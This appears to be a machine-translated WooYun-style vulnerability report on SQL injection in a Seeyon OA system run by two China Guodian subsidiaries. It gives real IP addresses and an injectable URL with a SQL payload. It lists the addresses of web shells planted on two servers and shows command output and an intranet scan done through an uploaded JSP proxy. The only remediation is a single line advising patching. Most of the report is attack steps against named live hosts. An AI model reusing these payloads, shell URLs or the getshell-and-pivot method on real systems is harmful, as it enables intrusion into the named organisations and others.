SQL Injection by China Guodian's two companies causes getshell to be updated with patches (involving Intranet Security)
Intranet Security
http://60.13.13.239:8080/yyoa/
Http: // 60.13.13.239: 8080/yyoa/common/js/menu/test. jsp? DoType = 101 & S1 = select % 20 database ()
No. @ basedir1D: \ Program Files \ UFseeyon \ OA \ mysql \ bin \..\
For more information about the shell method, see
WooYun: a bloody case (getshell) caused by a neglected vulnerability in Eastern Airlines media company)
Get shell
http://60.13.13.239:8080/yyoa/wel.jsphttp://60.13.13.239:8080/yyoa/cmd.jsp
Ipconfig
Local Connection of the Ethernet Adapter: connection to a specific DNS suffix .......: Local IPv6 address ........: fe80: 50fc: d4c8: 8aee: b822 % 11 IPv4 address ............: 10.100.130.5 subnet mask ............: 255.255.255.0 Default Gateway .............: 10.100.130.254
Upload a jsp proxy for Intranet Scanning
http://10.100.130.4 >> >>Apache-Coyote/1.1 >>Successhttp://10.100.130.5 >> IIS7>>Microsoft-IIS/7.5 >>Successhttp://10.100.130.11 >> >>Microsoft-IIS/6.0 >>Successhttp://10.100.130.12 >> >>Microsoft-IIS/6.0 >>Successhttp://10.100.130.6 >> ???>>Apache >>Successhttp://10.100.130.101 >> ???>>Apache >>Successhttp://10.100.130.253 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Successhttp://10.100.130.252 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
Some internal document information and logs
http://222.89.154.134:8080/yyoa/
Shell address:
Http: // 222.89.154.134: 8080/yyoa/cmd. jsp
Solution:
Upgrade programs and install patches